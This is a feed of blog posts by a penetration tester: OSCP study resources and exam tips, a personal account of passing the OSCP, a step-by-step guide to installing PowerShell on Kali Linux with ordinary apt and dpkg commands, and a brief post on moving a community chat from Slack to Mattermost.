Bandit 11-15: https://www.abatchy.com/2016/10/overthewire-bandit-11-15
Bandit 16-20: https://www.abatchy.com/2016/10/overthewire-bandit-16-20
Bandit 21-26: https://www.abatchy.com/2016/10/overthewire-bandit-21-24

UndertheWire: Probably my favorite place for challenges because they contain a huge set of PowerShell challenges. You can find their challenges here: http://www.underthewire.tech/wargames.htm

Root-me.org: A huge place that has challenges for almost everything in cybersecurity. For instance, you will see challenges in the following areas:

Network Forensics (Packet Analysis, Captured Traffic, Network Services)
Programming (C, PHP, Java, Shell-coding)
Reverse Engineering (disassemble applications)
Web Applications and Client Challenges.
Forensic Challenges.

Spend a few minutes going through some of these!

SANS Holiday Hack Challenges: https://www.holidayhackchallenge.com/past-challenges/

Capture the Flag Competitions (CTFs)/Cyber Competitions:

Bug Bounty Programs:

A great place to practice your skills and to make some possible profit as well! There are many bug bounty programs like Bugcrowd and Hackerone that you can participate for free. If you have never participated in bug bounty before check out Bugcrowd University as they provide a vast amount of material and resources to help you get started: https://www.bugcrowd.com/university/

Vulnerable Machines:

Hackthebox:

HTB Boxes to Prepare for OSCP (Youtube Playlist): https://www.youtube.com/playlist?list=PLidcsTyj9JXK-fnabFLVEvHinQ14Jy5tf

I want to give a huge thanks to ch4p and g0blin for starting Hackthebox! I am glad that I got to talk to you guys and I am grateful that we were able to help you guys out. I look forward to seeing you guys grow and will soon submit a box for you guys in the future!

Vulnhub:

Tips to participate in the Proctored OSCP exam:

Make sure your system is able to meet the software/hardware requirements that offensive security provides in order to run these services. You can find that information here: https://support.offensive-security.com/proctoring-faq/
Test your webcam to make sure it works. If you do not have a webcam for your system you can also use a spare laptop that has a webcam and connect the webcam session onto that system.
The ScreenConnect application needs to be running on your main system that you will be using to connect to your exam.
You can use multiple monitors for the exam. Keep in mind that the proctor must be able to see them and that they are connected to your system. The proctor will notify you about how many screens they see and you will need to confirm them with the number monitors you are using. If you use a system that has a monitor and it is not connected to the ScreenConnect application, then you will not be able to use that monitor for the exam.
Be prepared and log into your webcam and screenconnect sessions 30 mins before your exam.
Proctors cannot provide any assistance during the exam.
You can take breaks, a nap, or grab a cup of coffee during your exam. Just make sure you notify the proctor when you leave and when you return for your exam.
Also be dressed for your exam. I think that is pretty simple to understand why.

For any other questions you may have you can check out Offensive Security FAQ for Proctored Exams here: https://www.offensive-security.com/faq/

Other Resources:

NetSecFocus Learning Resources:

https://docs.google.com/spreadsheets/d/12bT8APhWsL-P8mBtWCYu4MLftwG1cPmIL25AEBtXDno/edit#gid=937533738

Books:

Kali Linux Revealed: https://www.kali.org/download-kali-linux-revealed-book/
Attacking Network Protocols: https://nostarch.com/networkprotocols
Red Team Field Manual: https://www.amazon.com/Rtfm-Red-Team-Field-Manual/dp/1494295504
Hash-Crack-Password-Cracking-Manual v3: https://www.amazon.com/Hash-Crack-Password-Cracking-Manual/dp/1793458618
The Hacker Playbook Series: https://securepla.net/hacker-playbook/
The Web Application Hacker Handbook: http://mdsec.net/wahh/
Violent Python: https://www.amazon.com/Violent-Python-Cookbook-Penetration-Engineers/dp/1597499579
Black Hat Python: https://nostarch.com/blackhatpython

Courses that can help you prepare for OSCP:

eLearnSecurity: eLearnSecurity offers affordable security training and a large amount of labs that you can practice in their hera lab network. They have their own certifications as well that you can take. These are the following courses that I took to help me prepare for OSCP.

Penetration Testing Student (PTS): https://www.elearnsecurity.com/course/penetration_testing_student/
Penetration Testing Professional (PTP): https://www.elearnsecurity.com/course/penetration_testing/
Web Application Penetration Testing (WAPT): https://www.elearnsecurity.com/course/web_application_penetration_testing/

SANS: SANS provides a wide variety of information security courses. Each of their courses are taught by very smart instructors who have been in this field for a very long time. However, these courses can be expensive if you are unable to get someone to pay for them. You can also try to apply for the SANS workforce training as well to be able to take their courses at a discount. I have taken most of the SANS course and I feel that the following courses below really helped me get a better understanding of what Pentesting is like in the actual field. Here are the courses that I would recommend if you are looking to prepare for OSCP.

Pentesterlabs: A lot of web app pentesting material in this course: https://pentesterlab.com/

Pentester Academy: https://www.pentesteracademy.com/topics

Other OSCP guides:

Conclusion:

Welcome! You have arrived to the end of this journey (well not your OSCP journey if you decide to pursue it!). If you read this entire guide, I certainly give you props for doing so. If you read only parts of it, then I still give you props because the main thing that is important to me is that you learned something from it! I hope you are able to use my guide in your OSCP journey and are able to learn some new things, just like I did when I started mine. If this guide was able to help you let me know I want your feedback for sure. I thanked a lot of people for helping me with my journey in this guide and I want to thank them again for their time and contributions for helping me learn and grow in the cyber-security field. If anyone has any questions about this guide or feedback please let me know as you can reach out to me on twitter or on NetSecFocus!

-TJNull Twitter: https://twitter.com/TJ_Null

Github: https://github.com/tjnull

Netsec Focus: Tjnull

Hackthebox Discord AMA: https://www.youtube.com/watch?v=41DIav25Mp4

Bugcrowd: https://www.bugcrowd.com/researcher-spotlight-ambassador-tony-aka-tj-null/

P.S: Considering this journey as an extra mile, I am going to have to insist at this point for you to…… Try Harder! -Offensive Security

An Adventure to Try Harder: Tjnull's OSCP Journey

Tue, 29 Jan 2019 00:00:00 +0000

Dedication:

Before I start discussing about my journey, I have a few people that I want to dedicate this blog post.

First, I want to dedicate this post to my parents and my sisters. Thank you for giving me the time to focus on this and also to prepare for this journey. I know during my journey I did not get to spend much time with you since I was pretty much on the computer every single day just prepping for this. I cannot thank you enough for supporting me and to keep pushing me to follow my dream. I will always be here for you.

Lastly, I want to thank the InfoSec community. A lot of you reached out to me in so many ways to check up on me and to support me through this journey. I know there were times where I even ranted to you about my journey and you were there to comfort me. I could list every single person that has reached out to me during this journey and this post would just be endless! Thank you for inspiring and also motivating me to learn more. I hope that I can always help someone in this field to learn something and be able to provide support when they are need.

You know who you are and you should give your self a pat on the back :D!

We live in a crazy time and the InfoSec world is only going to continue to grow at a rapid pace.

Now here what you all have been waiting for…

Motivation to take OSCP:

When I was a senior in high school, my instructor for my Security+ course gave me my first hacking cd (Backtrack 5r3) and a Backtrack Cookbook. Throughout the class we would go through a chapter of the book each week and we do hands on labs/exercises to identify security issues or vulnerabilities. I fell in love with it and I knew becoming a hacker or a pentester was going to be my career for me. In high school I had my A+, Net+, and my CCNA but I was always curious about what pentesting certifications were out there which led me to OSCP. After looking at the syllabus I knew I was not ready but I was destined to get this certification on the first try for preparing for it.

Previous Experience:

I’ve been in the IT/Cyber Security Field since 2012 (If you count education experience really). I started working as a depot repair technician fixing broken laptops and I hated it. After working there, I was offered an opportunity to be a cyber lab technician for a community college that I graduated from. That place is where I learned so much more about cyber security because my co-worker and I had to spin up the entire program from the ground up…It was awesome! My coordinator would assign me with so many tasks which gave me the ability to learn more and to hone my skills. After two years I took another position to work for govt contractor as a SOC Analyst because the college was unable to hire me full time. I never left the college though because I was offered to be an adjunct professor and teach the Ethical Hacking class they offered.

One thing that I enjoyed in high school and throughout college was competing in cyber competitions like Cyber Patriot and National Cyber league. These competitions really help me get more engaged in cyber security and I still enjoy competing today. In the past 5 years I have competed in 205 competitions including MACCDC, ALCCDC, Global Cyberlympics, and my favorite one of all SANS NETWARS. I won my first my time competing at SANS Netwars and was given the opportunity to compete in the SANS Tournament of Champions and it was incredible. With my work experience, trainings, and personal hobbies I was able to obtain a lot of exposure to the field and improve my skillsets which helped me through my journey.

• Operating Systems: Windows, Linux • Windows Server Administration • Virtualization: Vmware, Citrix, Proxmox • Networking (Cisco Routers Switches, DHCP, DNS, Wireshark, and configuring firewalls) • Programming: Python, Bash, Ruby

Trainings I took before I attempted OSCP:

2012-2015 Comptia A+ training. CompTia Net+ and CCNA Routing and Switching. Security+ training. Microsoft MCSA training.

2016-2017: CISCO CCNA Cyber Ops training.

2017-2018: SANS 504: Hacker Tools, Techniques, Exploits, and Incident Handling SANS 560: Network Penetration Testing and Ethical Hacking SANS 542: Web App Penetration Testing and Ethical Hacking SANS 573: Automating Information Security with Python SANS 564: Red Team Operations and Threat Emulation Derbycon 2018 Training: Windows Attack and Defense Elearnsecurity: Penetration Testing Professional v5

(I have to thank my employer currently for the SANS Courses because they are very supportive for my education and helping me to continue to learn more about this field.)

Pre-Requisites for PWK:

From my perspective I was nervous at first reading the pre-requisites for taking the OSCP course but I will say this don’t let them throw you off really. Even when it states “Familiarity of Bash scripting with basic Python or Perl a plus” will definitely help you but it is not really a requirement. I am not saying you shouldn’t learn python, perl, or ruby. What I am trying to say is as long as you have an understanding of the programing language and you can understand the scripts, then you will be fine.

As practice for fun I would take exploits online (Metasploit Modules for sure!) and write them in another programming language. For instance, take an exploit that is written in python and write it in ruby. Now there are many ways you can learn more about programming online! You just have to find which material or resources will work for you. Personally, being hands on writing scripts was the best way I got to learn more about python, ruby, and bash. In the SANS 573 class Mark Baggett created all of the lab assignments using pywars to make us write the proper scripts to solve the python challenges he created.

Here are some resources that I used to help me prepare for the PWK labs and the OSCP Exam.

Abatchy’s noob friendly guide to prepare for OSCP:

https://www.abatchy.com/2017/03/how-to-prepare-for-pwkoscp-noob

A good list of resources that are open source you can use to prepare for the PWK/OSCP. Abatchy is also a good friend of mine and my next post will be a guide like his but updated with more resources. Take the time to go through this material as the structure of his guide is based on the syllabus for the OSCP.

Vulnhub:

The only way to prepare yourself is to get your hands dirty. Vulnhub contains a large collection of vulnerable machines that you can go through to test your skills. I posted a list on twitter a few days ago that contain OSCP-Like boxes that I used to prepare for the class.

Link to the OSCP-Like Vulnhub Boxes: https://docs.google.com/spreadsheets/d/1dwSMIAPIam0PuRBkCiDI88pU3yzrqqHkDtBngUHNCw8/edit#gid=0

Hackthebox:

Hackthebox is a fantastic online platform allowing members to test their penetration testing skills. There are so many challenges and machines that get released on a weekly basis. The best part is that it is free to the community! You need to pass the first challenge to obtain an invite code in order to play with their challenges. If you get VIP access you can be able to go through a large amount of the retired boxes as well.

If you cannot afford VIP access do not worry because IppSec has a fantastic YouTube channel where he does full on walkthrough’s showing you how to obtain user and root access on the system. Each week he usually tries to add some new content for each box and it really helped me when he did when I was in the PWK labs.

As of January 29, 2019, here is a list of HacktheBox machines that are OSCP Like: https://docs.google.com/spreadsheets/d/1dwSMIAPIam0PuRBkCiDI88pU3yzrqqHkDtBngUHNCw8/edit#gid=1839402159 Link to Ippsec youtube playlist: https://www.youtube.com/playlist?list=PLidcsTyj9JXK-fnabFLVEvHinQ14Jy5tf

If there is anything that you should focus on while preparing to start PWK is to make sure you have enough time invest into the labs. Seriously, I managed my time in the labs and would spend at least 4-5 hours a on weekday in the lab and over 5 hours on the weekend for sure. Make sure you talk to your family, girlfriend, boyfriend, friends, or anyone else to let them know about what you are going to be doing for the next 30, 60, or 90 days! Trust me I had to remind my father a few times about what I was doing as he would yell at me to get off of the computer XD. The total amount of time I dedicated to the lab and the exam was exactly 212 hours. As long as you can dedicate 5 hours per day or 20 hours per week to study you should do fine in the labs.

The 90-day journey for me…PWK-Course Time!

So, you registered for the course great! You should have gotten your links for your lab material which contains the following: • 380-page pdf manual going through the course material • A set of videos to go along with the course material • VPN connection pack to access the PWK lab environment

For the first few days I will admit the pdf can be dry with the content provided but if you watch the videos with it can be very enjoyable. The exercises were super fun as well and when you do them document them as well. When I finished the videos and manual, I went through some of the sections that I felt weak on to hone my skills on them. For instance, I went through the buffer overflow section many times just to understand the process of it. If you are just starting out then you will certainly enjoy the exercises as much I did because they are direct walkthroughs of how to complete each exercise step by step. Seriously, I have to give my props to Offsec because they definitely put the time and energy to make it easy and clear to understand the material. If you get stuck or are having issues with your exercises remember to check the Offsec forum because there may be a chance that other students could be having the same issues as well.

As an extra bonus Offsec allows you to get extra points if you document your walkthrough of exploiting 10 systems and all of the exercises. The max score you can get for doing this is 5 points depending on how well you documented your exercises and 10 lab boxes.
I did the documentation for this to obtain the extra 5 points since it could come in handy but also it is a great way to improve your documentation skills. This is extremely important because you will have to write a report at the end of your OSCP exam as well. The lab report took me a total of 25 hours (Over 5 Days) to document.

PWK Lab Network:

Now comes the lab network! This part of the course is the best part in my opinion and I got extremely addicted to it. Over 50 lab machines in 3 separate networks (Public, IT, Dev, and Admin) that you get to hack…let the fun begin! I spent a total of 127 hours in the PWK Lab network and I was able to pwn the entire lab network in 28 days. The labs are super addicting for sure because each box has its own range of difficulty that can be extremely easy to the point where you can get extremely frustrated. I remember owning 17 boxes in 14 hours for one day and then getting stuck on a system in the admin network for 3 days straight.

Each machine will test your ability to from understanding the lessons taught from the course content but even your research ability as well. This is where you get to build your own methodology when you attack these machines and remember everyone has their own different methodology. In addition, your ability to google-fu will help you tremendously here to identify new techniques, tools, understanding services, and learning more about the operating systems itself. After you own a machine make sure you document everything you did to obtain a shell or even how you priv esc to obtain a full shell. You will realize that there is not just one way to own a machine as each machine in PWK can have multiple attack vectors.

Things to keep in mind when you are attempting the lab network:

• Enumerate Enumerate Enumerate! (Port scan (UDP Scan as well!), version scan, OS scan, web scan, research, etc) • Understand the purpose of the system (What does it do?, Who uses it?, Why was it created?) • Documenting your steps will help you for sure as you can review them and they may come in handy for another machine you are working on. I used OneNote for Windows 10 for my documentation and it was fantastic to use. My notes were also synced to the cloud so I did not have to worry about losing them and I had the ability to review them from multiple devices if needed. If you would like to use the OneNote template that I used for the labs and the exam you can find it here (Credit goes all to maik for making this): https://maikthulhu.github.io/2017-11-20-onenote-layout/ • Track your hours spent to see your improvement and it will help you understand how you are using your time wisely in the lab.

OSCP Exam Prep:

Sorry I will not being giving anyway spoilers about the exam but I will share my advice to you on how I prepared for it 😊. After pwning all of the machines in the lab I had two weeks to prepare for my exam! Keep in mind that the exam slots do fill up fast so make sure that you schedule your OSCP exam at least one month in advance. If you are unable to commit in that time do not worry at all because you can always re-schedule it for a later day to help better prepare yourself for it.

One blog that I have to give credit to for helping me prep for the exam mentally was this one below: https://www.vortex.id.au/2017/05/oscp-exam-preparation-exam-day-report-day/ Definitely take some time to read it because it does help you prepare mentally before the exam. With vortex advice I thought I share with you all what I did to prepare in my final days before the exam.

5 days from the OSCP exam:

During my preparation I started gathering my cheatsheets, tools, exploits, and prepping my notes ahead of time making it easy instead of me scrambling to find them during my exam. Once you have everything prepped make sure you make a backup of your kali system and also create snapshots in case you need to revert.

Another tip I will also mention is take some time to draft your exam report. Even if you pass or fail it is good to have it already set up since you are not wasting more time creating it during the 24 hours given from Offsec to submit the report to them. For the proctor part of your exam you can use your laptop for your webcam! Make sure that it works and that it is also not in the way of your desk area when you are taking the exam. Plan your attack strategy and think of how you are going to attack each target in your exam.

3 days from the OSCP Exam:

Grab your snacks, prep your meals, and make sure you have your caffenine ready for this 23 hours and 45 minute exam you are about to take. Also get a music playlist set up. I was jamming to few of my rock and roll playlists and I also started with and of course playing some dual core in the beginning of my exam! All the things by Dual Core: https://open.spotify.com/track/3ZzxtumoIENCi16HAKuiLU?si=XNGD5WAkTC602wjzslIiXg

1 day from your OSCP Exam:

If you have done everything that I have recommended then the the only thing you should be doing is rest. Hands off the keyboard! Go spend time with your family or friends to let your mind relax. Stressing over your exam is not going to help you when you have to take it tomorrow and make sure to have positive thoughts. Reflect on what you have achieved and what you have done. Make sure you go to bed early and also find a quiet place to sleep so you are not distracted by someone. Also do not drink to much…1 beer is okay but do not go overboard 😉

OSCP Exam:

IT’s Time! Today is the day you take your exam. Now do not rush everything you have make sure you get up an hour or two early from your exam. During that time go make breakfast and get your stuff setup and running. Check your vm’s and have your cheat sheets ready to go on your system.

Before the last hour till you start your OSCP exam, login into the webcam program and screen connect program to make sure that those applications are working. I logged in 30mins before my OSCP exam and they were not able to see my webcam on their end for the exam. I had to work with offsec to troubleshoot this issue until we figured out another resolution. By the time we figured out a resolution offsec sent me my exam VPN connection pack and I losted 30mins of my exam time because of it.

My attack strategy that I planned actually failed because at certain times since I was unable to get anything working. I was worried that I was going to fail but during those times I was reminded by someone and I also had a lot of support from the infosec community rooting for me to pass. I was not ready to quit that easy. There was one person that mentioned this tip to me about the exam that I will always remember: “you’re going to run out of ideas before you run out of time. take breaks. walk away for a bit. dont be afraid to go to sleep for a few hours, especially if youre stuck” -0xdf

With this I started taking 2-3min break and sometimes 15mins breaks as well to clear my head. When you leave your room you will also need to notify the proctor when you are leaving and when you return so that they can document it. Also stay hydrated during the exam. I had two gallons next to my desk to fill up with water to keep my brain working throughout the entire time of the exam. After 24 hours I was able to get enough points to pass the exam and offsec did not give me my extra 30mins that I lossed during the exam. I closed my webcam session and also the screenconnect program and got a cup of coffee to celebrate.

With me having enough points the clock started for writing the exam report. I was going to try to take a nap but I could not fall asleep due to my adernaline and full of excitement that I felt for passing this exam (Coffee does it’s wonders)! So I stayed up for another 14 hours to write the exam report. I am glad that I built my Exam report ahead of time because I was able to fill the needed information in quicker then creating a whole new tempelate. Once I finalized my exam I double checked everything that I did, made sure my screenshots were correct, and validated the system information before I sent it to offsec. I also included my lab report to send to them as well.

Once I sent it to them I had to wait for offsec to send me a “Acknowledgement of Receipt” to let me know that they got my reports. 12 hours had passed and they sent me “Acknowledgement of Receipt” letting me know that they got my reports.I submitted my report on Friday and I received my exam results on Monday at 9am giving me the wonderful news that I worked hard to receive:

4 years of hard work paid off on my first exam attempt!

Final Thoughts:

I have to say my OSCP journey was one the most fun, technically challenging, and absolute amazing experience of my life. I am very glad that I started it last year and was able to start the new year with being OSCP certified. I just wish I did not put it off as much as I did even though my employer gave me a lot of SANS courses and other trainings to prep for it. As you can already tell I put an extreme amount of effort into my study time then I did in the entire course alone. I now understand why Offsec uses the motto “Try Harder” because in honesty that is what you have to do to get through the labs and the exam.

No matter what happens never give up! If you are stuck or are having issues take a step back think about what you have tried. If my journey gave you some advice and motivation to take the OSCP then I wish you the best on the journey ahead. It is not an easy exam but work hard and you will certainly be rewarded. If you do not think you are ready for the course do not worry or even stress about it. Remember to look over the resources I posted earlier to help prepare for it.

Future Plans?

1 offsec cert down…two more to go! My plan is to go for OSCE and OSEE. I also want to start getting more into red teaming and learn more about Cobalt Strike. During that time, I am working on building an ethical hacking class and also an updated OSCP Noob Friendly guide that I hope to release soon (Thanks Abatchy for your permission 😉).

Conclusion:

I certainly hope you enjoyed reading my exeperience with OSCP. I know someone is going too see some typos in here but in the end we are all not perfect so :D. Not to mention I covered a lot of things but that is what I do in general really. DETAILS DETAILS DETAILS!

If you wish to find me, I am usually attending security conference for fun to learn more about InfoSec from the community or competing in CTF’s for fun as well! You can find me on NetSecfocus and on Twitter as well. Thank you again for reading this and I certainly hope that you enjoyed it 😊.

-Tjnull Twitter: (@TJ_Null)

Installing Powershell and Powershell Preview on Kali Linux

Tue, 25 Sep 2018 00:00:00 +0000

Introduction
Installing Powershell
Changelog
Conclusion
References

Introduction:

A long time ago, Kali Linux released an article about how you can now install PowerShell on Kali Linux. Here is the link and instructions:

https://www.kali.org/tutorials/installing-PowerShell-on-kali-linux

If you follow the instructions you will notice that we need another package to install PowerShell:

root@kali:~# apt -y install PowerShell
Reading package lists... Done
Building dependency tree
Reading state information... Done
Some packages could not be installed. This may mean that you have
requested an impossible situation or if you are using the unstable
distribution that some required packages have not yet been created
or been moved out of Incoming.
The following information may help to resolve the situation:

The following packages have unmet dependencies:
PowerShell: Depends: libcurl3 but it is not going to be installed
E: Unable to correct problems, you have held broken packages.

Currently Kali Linux 2018.3 already contains libcurl4 and if we try to install libcurl3 you should see something like this:

root@kali:~# apt-get install libcurl3
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following packages will be REMOVED:
curl libcurl4 Metasploit-framework
The following NEW packages will be installed:
libcurl3
0 upgraded, 1 newly installed, 3 to remove and 0 not upgraded.
Need to get 260 kB of archives.
After this operation, 250 MB disk space will be freed.

There are also other packages that use libcurl4 but it surprised me that Metasploit would be removed if I reverted back to libcurl3.

With this issue I wanted to investigate further and see if I can find a resolution. PowerShell offers two package versions for Debian (Jessie and Stretch)

You can find them here:

Jessie: https://packages.microsoft.com/repos/microsoft-debian-jessie-prod/pool/main/p/

Stretch: https://packages.microsoft.com/repos/microsoft-debian-stretch-prod/pool/main/p/

I tested the installation for all of the PowerShell packages in stretch and jessie and all of them required libcurl3

Stretch and Jessie packages that requires libcurl3: 
PowerShell_6.0.0-1.deb                             10-Jan-2018 17:47            51924632
PowerShell_6.0.1-1.deb                             25-Jan-2018 18:31            52137558
PowerShell_6.0.2-1.deb                             15-Mar-2018 17:32            52192714
PowerShell_6.0.3-1.deb                             19-Jul-2018 21:29            52503432
PowerShell_6.0.4-1.deb                             10-Aug-2018 00:11            52557832

This made no sense to me that both Stretch and Jessie need libcurl3 to run. I submitted an issue to PowerShell on GitHub to get a better understanding on why PowerShell needed libcurl3. Turns out I got the answer I was looking for:

“PowerShell Core and CoreFX no longer has a dependency on libcurl See GitHub issue #6964.”

So why does the PowerShell package for Debian need libcurl3 if it is no longer a dependency? Since PowerShell for Kali is only supported by the community, I wanted to raise the issue to Kali Linux team about this. When I spoke with them they were aware that PowerShell for Kali was not working and were looking into it as well. A few days later I finally figured out that the PowerShell Debian repositories have not been updated properly for Kali Linux. The PowerShell team told me that they would fix this in the new release which was going to be released very soon.

The reason why they were going to push this in the new release is because “PSCore6.0.x depends on .NET Core 2.0.x which DOES depend on libcurl. PSCore6.1 depends on .NET Core 2.1.x which does NOT depend on libcurl.”

As the PowerShell team was working on updating the new release I found a workaround that you could use PowerShell preview on Kali Linux 2018.3. These packages do not require the libcurl3 dependency and you can install the following packages below:

Stretch: 
PowerShell-preview_6.1.0~preview.3-1.deb           13-Jun-2018 00:12            59438156
PowerShell-preview_6.1.0~preview.4-1.deb           19-Jul-2018 21:13            57913672
PowerShell-preview_6.1.0~rc.1-1.deb                22-Aug-2018 01:09            56712364

Jessie: 
PowerShell-preview_6.1.0~preview.3-1.deb           13-Jun-2018 00:12            59438156
PowerShell-preview_6.1.0~preview.4-1.deb           19-Jul-2018 21:13            57913672
PowerShell-preview_6.1.0~rc.1-1.deb                22-Aug-2018 01:09            56712364  

Installing PowerShell:

First, we need to download and add the public repository GPG key so APT will trust the packages and alert you to any issues with package signatures:

curl https://packages.microsoft.com/keys/microsoft.asc | apt-key add -

Second, Once the GPG key has been added, we need to add the Microsoft package repository to its own package list file under /etc/apt/sources.list.d/ This will allow us to also pull any updated packages that the PowerShell team will release in the future:

echo "deb [arch=amd64] https://packages.microsoft.com/repos/microsoft-debian-stretch-prod stretch main" > /etc/apt/sources.list.d/PowerShell.list
apt update

Third we will need to install the following dependency packages below to continue the installation. You can download the package here:

libicu57: https://packages.debian.org/stretch/amd64/libicu57/download
icu-devtools: https://packages.debian.org/stretch/amd64/icu-devtools/download
liblttng-ust0: https://packages.debian.org/stretch/amd64/liblttng-ust0/download
liburcu4: https://packages.debian.org/stretch/amd64/liburcu4/download
liblttng-ust-ctl2: https://packages.debian.org/stretch/amd64/liblttng-ust-ctl2/download

Install the packages in the following order here:

root@kali:~# dpkg -i liburcu4_0.9.3-1_amd64.deb 
Selecting previously unselected package liburcu4:amd64.
(Reading database ... 341730 files and directories currently installed.)
Preparing to unpack liburcu4_0.9.3-1_amd64.deb ...
Unpacking liburcu4:amd64 (0.9.3-1) ...
Setting up liburcu4:amd64 (0.9.3-1) ...
Processing triggers for libc-bin (2.27-5) ...

root@kali:~# dpkg -i liblttng-ust-ctl2_2.9.0-2+deb9u1_amd64.deb 
(Reading database ... 341748 files and directories currently installed.)
Preparing to unpack liblttng-ust-ctl2_2.9.0-2+deb9u1_amd64.deb ...
Unpacking liblttng-ust-ctl2:amd64 (2.9.0-2+deb9u1) over (2.9.0-2+deb9u1) ...
Setting up liblttng-ust-ctl2:amd64 (2.9.0-2+deb9u1) ...
Processing triggers for libc-bin (2.27-5) ...

root@kali:~# dpkg -i liblttng-ust0_2.9.0-2+deb9u1_amd64.deb 
(Reading database ... 341748 files and directories currently installed.)
Preparing to unpack liblttng-ust0_2.9.0-2+deb9u1_amd64.deb ...
Unpacking liblttng-ust0:amd64 (2.9.0-2+deb9u1) over (2.9.0-2+deb9u1) ...
Setting up liblttng-ust0:amd64 (2.9.0-2+deb9u1) ...
Processing triggers for libc-bin (2.27-5) ...

root@kali:~# dpkg -i libicu57_57.1-6+deb9u2_amd64.deb 
(Reading database ... 429929 files and directories currently installed.)
Preparing to unpack libicu57_57.1-6+deb9u2_amd64.deb ...
Unpacking libicu57:amd64 (57.1-6+deb9u2) over (57.1-6+deb9u2) ...
Setting up libicu57:amd64 (57.1-6+deb9u2) ...
Processing triggers for libc-bin (2.28-8) ...

root@kali:~# dpkg -i icu-devtools_57.1-6+deb9u2_amd64.deb 
Selecting previously unselected package icu-devtools.
(Reading database ... 341748 files and directories currently installed.)
Preparing to unpack icu-devtools_57.1-6+deb9u2_amd64.deb ...
Unpacking icu-devtools (57.1-6+deb9u2) ...
Setting up icu-devtools (57.1-6+deb9u2) ...
Processing triggers for man-db (2.8.3-2) ...

Once you have installed the following packages you can now install PowerShell preview on your system:

root@kali:~# apt-get install PowerShell-preview
Reading package lists... Done
Building dependency tree       
Reading state information... Done
The following NEW packages will be installed:
  PowerShell-preview
0 upgraded, 1 newly installed, 0 to remove and 843 not upgraded.
Need to get 56.7 MB of archives.
After this operation, 153 MB of additional disk space will be used.
Get:1 https://packages.microsoft.com/repos/microsoft-debian-stretch-prod stretch/main amd64 PowerShell-preview amd64 6.1.0~rc.1-1.debian.9 [56.7 MB]
Fetched 56.7 MB in 4s (15.7 MB/s)             
Selecting previously unselected package PowerShell-preview.
(Reading database ... 341785 files and directories currently installed.)
Preparing to unpack .../PowerShell-preview_6.1.0~rc.1-1.debian.9_amd64.deb ...
Unpacking PowerShell-preview (6.1.0~rc.1-1.debian.9) ...
Setting up PowerShell-preview (6.1.0~rc.1-1.debian.9) ...
Processing triggers for man-db (2.8.3-2) ...

To run PowerShell preview in your console, type the following command pwsh-preview. You should see a new prompt that starts with “PS”. If you see this prompt then you have successfully installed PowerShell!

root@kali:~# pwsh-preview
PowerShell 6.1.0-rc.1
Copyright (c) Microsoft Corporation. All rights reserved.

https://aka.ms/pscore6-docs
Type 'help' to get help.

PS /root> 

Changelog

September 16 2018:

The PowerShell team on GitHub was able to release a new version of PowerShell. Below are the versions that currently work in Kali Linux:

Stretch: PowerShell_6.1.0-1.deb 13-Sep-2018 00:34 58286110
Jessie:  PowerShell_6.1.0-1.deb 13-Sep-2018 00:33 58287274  

If you have installed PowerShell preview on your Kali system, all you need to do is run apt-get install PowerShell: Note: If you did not install PowerShell preview, please refer to the installation guidelines. You will need to have the following depended packages that were used in PowerShell-preview to run PowerShell on kali:

root@kali:~# apt-get install PowerShell
Reading package lists... Done
Building dependency tree       
Reading state information... Done
The following NEW packages will be installed:
  PowerShell
0 upgraded, 1 newly installed, 0 to remove and 843 not upgraded.
Need to get 0 B/58.3 MB of archives.
After this operation, 158 MB of additional disk space will be used.
Selecting previously unselected package PowerShell.
(Reading database ... 342275 files and directories currently installed.)
Preparing to unpack .../PowerShell_6.1.0-1.debian.9_amd64.deb ...
Unpacking PowerShell (6.1.0-1.debian.9) ...
Setting up PowerShell (6.1.0-1.debian.9) ...
Processing triggers for man-db (2.8.3-2) ...

To run PowerShell, make sure you type the following command: pwsh You should see a new prompt appear with “PS”

root@kali:~# pwsh
PowerShell 6.1.0
Copyright (c) Microsoft Corporation. All rights reserved.

https://aka.ms/pscore6-docs
Type 'help' to get help.

PS /root> exit
root@kali:~# pwsh-preview
PowerShell 6.1.0-rc.1
Copyright (c) Microsoft Corporation. All rights reserved.

https://aka.ms/pscore6-docs
Type 'help' to get help.

PS /root>    

What I also found interesting is you can have PowerShell and PowerShell-preview running on the system :D

March 28 2019

Powershell version (powershell_6.2.0-1.deb 28-Mar-2019 19:05 57864528) works fine in Kali Linux. No changes were made to the installation guide.

May 21 2019

Powershell Version (powershell_6.2.1-1.deb 21-May-2019 18:03 57853712) works fine in Kali Linux. No changes were made to the installation guide.

May 30 2019

Powershell-Preview version: (powershell-preview_7.0.0-preview.1-1.deb 30-May-2019 21:29 53267226) works in Kali Linux. There are a few cmdlets that need to be tweaked. Example Update-Help does not pull any updates for the powershell commands.

August 14 2019

Powershell-Preview: (powershell-preview_7.0.0-preview.2-1.deb 17-Jul-2019 20:56 54033798) works in Kali Linux. There are still a few cmdlets that need to be tweaked and updated.

Will be working with the Kali Linux team on making an app image that will be fully installed on Kali Linux in the future :D

September 6 2019

Powershell and Powershell Preview can now be installed on Kali through the Kali Linux repository! To install powershell and powershell preview on Kali Linux you will need to type the following commands:

apt install powershell

apt install powershell-preview. 

Kali will do the rest for you as there is no need for manual installation (Unless you want to!). I want to give a huge shout out to raphaël hertzog and the Kali Linux team as we were able to finally get it ported and working on Kali Linux repos! :D

Twitter Proof: https://twitter.com/kalilinux/status/1170069546012745728

Conclusion:

I really want to thank the PowerShell team and the guys at Kali for getting this issue fixed in a quick manner. I hope you have enjoyed this post and will enjoy testing PowerShell on Kali Linux :)

If you have any questions or issues trying to install PowerShell on Kali please let me know. You can find me on twitter (@TJ_Null) and in the NetSec Focus community platform at https://mm.netsecfocus.com/join/

References

GitHub Issue: https://github.com/PowerShell/PowerShell/issues/7719

Kali: https://bugs.kali.org/view.php?id=4958

Down with Slack. Mattermost FTW!

Tue, 27 Mar 2018 17:00:00 +0000

Many of you may already know this, but as of March 15, 2017 NetSecFocus decided to migrate our community to our own Mattermost server. There were a few reasons for this with the main reasons being message retention in Slack. At our volume messages were only lasting for a maximum of 10 hours which made it impossible to search for anything meaningful. Due to this and the impossibility of paying about $12k USD/month for Slack we decided to ditch it for something better.

After many months of testing various chat platforms, we decided Mattermost was the best compatible for us. Since it’s open source, we could also make some customizations that make it fit us even better than Slack ever will.

On March 24, 2017, we deleted our old Slack workspace. RIP

